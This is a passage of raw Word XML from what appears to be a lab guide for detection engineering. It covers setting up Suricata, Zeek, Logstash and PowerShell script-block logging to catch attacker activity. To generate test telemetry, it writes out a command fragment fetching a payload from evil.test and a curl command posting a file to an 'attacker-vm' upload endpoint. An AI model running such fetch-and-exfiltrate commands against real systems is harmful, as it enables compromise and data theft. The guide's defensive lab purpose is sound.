      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> http://evil.test/payload.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350218D4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulate data exfil (HTTP POST to local server)</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F5A3A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Run a simple HTTP server on attacker VM (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB53B6A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># On attacker VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB50AE7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F701F01" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># On target VM (simulate exfil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B623019" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>curl -X POST --data-binary @/path/to/file.txt http://attacker-vm:8000/upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBF48A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Logstash/Suricata will capture this if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Packetbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/Suricata are monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41413A95" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>These manual logs are easy to parse and allow you to test detection rules quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71480F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="00EF3123">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE650CC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4.4 Option C — Network-based artifacts (Suricata / Zeek)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B68AEF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Suricata or Zeek produce network logs (EVE JSON for Suricata) that are great for detecting C2/exfil patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FCD116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Install Suricata on your network sensor VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDFFCD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Docs: https://suricata.io/docs/</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Example (Ubuntu):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B27E7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB686E2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> apt install -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B616E43" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># configure interface (edit /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFB1DF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> enable --now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51E76DF6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Suricata outputs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (set in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367247D1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Ingest Suricata EVE JSON into Logstash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5939E169" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/pipeline/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8953BC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E1DED" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  file {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEE3A4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    path =&gt; "/var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FDC8E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>start_position</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; "beginning"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CDC1F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sincedb_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; "/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata.sincedb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5755D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    codec =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44646466" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    type =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C814F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA98EE4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB7679" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="5C5D0242" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C7304" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [type] == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4566DF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    # you already have JSON parsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488741F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB8D86" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED1135C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0ADC7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="077780CA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>output {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E948287" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726030E8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    hosts =&gt; ["elasticsearch:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F413980" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    index =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>-%{+YYYY.MM.dd}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447E234" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    user =&gt; "elastic"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDC4B9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    password =&gt; "${ELASTIC_PASSWORD}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F30D342" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2573F3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE1D79" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Restart Logstash (docker compose restart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D8FE2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Now, run network tests (curl POST to attacker) and Suricata will create entries in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> that Logstash ingests. Check Kibana </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>-* index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725C4B8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Suricata docs: https://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF884BD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="733CBC7E">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08FB7C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4.5 Option D — Zeek (formerly Bro) flows &amp; logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A00F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Zeek generates conn.log, dns.log, http.log etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Install Zeek: https://docs.zeek.org/en/current/install.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Forward its logs similarly (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> or Logstash file input).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D3B64" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="7C181120">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC19F0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4.6 Ingesting Windows PowerShell Operational logs (important for APT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487BBEEA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Windows PowerShell emits logs to the Microsoft-Windows-PowerShell/Operational channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57EFB9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Ensure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> config includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E946872" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>winlogbeat.event_logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E77A7E5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  - name: Microsoft-Windows-PowerShell/Operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70C4CD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Additionally enable PowerShell Module Logging &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ScriptBlockLogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> on the test Windows VM (via Group Policy or registry) to capture command contents (for lab only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743AA052" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ScriptBlockLogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (lab only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08255E4E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># On Windows (Admin PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F9B33" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>EnableScriptBlockLogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">" -Value 1 -Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>DWord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3211A43B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockInvocationLogging" -Value 1 -Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>DWord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69D647D1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Docs about PowerShell logging: https://learn.microsoft.com/en-us/powershell/scripting/security/overview-of-powershell-script-block-logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E1BB4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">After enabling, run a simulated PowerShell command and view the event in Kibana under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>-*.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9AF1E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important privacy note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ScriptBlockLogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> records command contents — don’t enable in production without policy review.</w:t>
      </w:r>
    </w:p>
